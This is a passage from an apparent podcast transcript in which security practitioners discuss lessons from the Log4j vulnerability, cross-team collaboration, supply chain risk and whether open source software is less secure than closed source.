But I'm hoping that when the tools get implemented and you go through the growing pains, that's where you should ideally get to, right? That's the idealistic version. Yeah, Neil, I like how you brought it back to something simple, which is just: get everybody in a room and play these things out and talk about it, right? You don't need to be advanced. You get a lot just by getting all the relevant parties in the room. I was meeting with a university the other day, a large university in California. And they didn't have all the processes in place and all the technologies and all the advancements. But what they had was a desire across all the teams to work toward the same mark. And I thought it was really cool, because when we asked one of the developers, hey, what do you think about security? he said, I just want to build things in a safe way and not do something that's going to go against what the organization is trying to do. It was such a simple quote, but it reflected the appropriate mindset, right? If nothing else, if everybody gets in a room across platform, security, operations, and development, and starts talking about, hey, this is a real problem, let's have regular recurring meetings about the realities of cybersecurity risk, I think that's huge, right? So I want to underscore what you were talking about: where you have these war rooms, you have these conversations, just to have that dialogue begin, I think, is critical, you know, to have that desire there.
Okay, so silver lining: if Log4j is the catalyst for having these discussions, to say, hey, we've got this problem, it's widespread, there's going to be another one, then the dark corners get illuminated a little bit and teams start to think about how to make this better. I mean, it speaks to all the current trends in security and the news you see around supply chain and vulnerabilities and compromised vendors and being able to sort this stuff out. It's not just technology, either, right? It's people and processes that are super important for this stuff. So it's a good opportunity to put some diligence into making sure that you fix it this time, but then for the next one you're just as prepared. Yeah, I have a little bit of a hot potato for the end topic, because we're coming up on time. Because it's an open source vulnerability, there has been conversation about, you know, is open source secure? And what is secure open source? How do we make sure all these packages are maintained? Just want to throw it out there. What's your opinion? Do you think it's overblown? Do you think there's crappy software everywhere and you just need to take reasonable mitigations? What's your opinion on that whole "open source can't be secure and you're going to continue having these issues crop up"? Well, I mean, if this were a commercial product, the same vulnerability would be present. We'd just know a lot less about it, right? I mean, there's never a point where hiding any of this stuff really makes any sense in terms of security. So I think that for open source, this is really one of its shining moments, right?
That, you know, vendors that are dependent on this were able to easily determine that the open source components in their environment were impacted by it, and suppliers like Red Hat were able to quickly alert customers and supply fixes as soon as those became available, because it was very obvious to everyone. There's pressure on anyone who's shipping this known vulnerable version, and I think that the openness of the process makes sure of that. It's easier to do diligence when everything is open in this way. It was also easier to share the pain online. I was watching everybody go, "wait, what?", and you just see everybody kind of come together to discuss what's going on and how to fix it. It's enlightening. I don't know, it's like a therapy session. Yes, right. You can't get that kind of collaboration with a closed source environment, right? And you have to depend on the responsibility of the vendor to disclose those things when they come up in a closed source world, especially when something's being shipped to you as a binary: an operating system image, a router or switch image. Those things aren't very transparent, and so you're relying on the goodwill of the vendor that supplied it and their expertise. Now, most vendors are responsible in that way. But with this one, it's pretty clear. It's pretty easy to tell who's got the vulnerability present and put pressure on them to release fixes. So, mm-hmm. Any other thoughts? Eric, Neil, are you going to let that one just simmer? You're good with that answer? You know, I think it's a software problem. It's not an open source or a closed source problem, right? So it's really about having good process, being able to find these things, having vendors you trust and can work with. And then, you know, the assume-breach stuff: limiting the blast radius, being able to find anomalies, all of that.
Because no matter how good your vendors are, no matter how good you are at this stuff, at some point somebody's going to be faster, smarter, or luckier than you and is going to compromise an asset. So at the end of the day, I don't think it makes a strong difference whether it's closed source or open source. It matters that it's software. Ooh, drop the mic on that one. Any news, anything you guys want to share before we take off and, well, head to dinner for me? I know you guys are on the West Coast. Well, Eric is, but any last words, anything you want to cover before we take off? Stay tuned for the next exciting vulnerability. I was going to say, yeah, next month's episode. Yeah, next month, third Tuesday. Hopefully we'll be talking about some lighter subjects, I hope. And some more news about StackRox open source coming up in the coming months. So stay tuned, and stay safe and stay secure out there.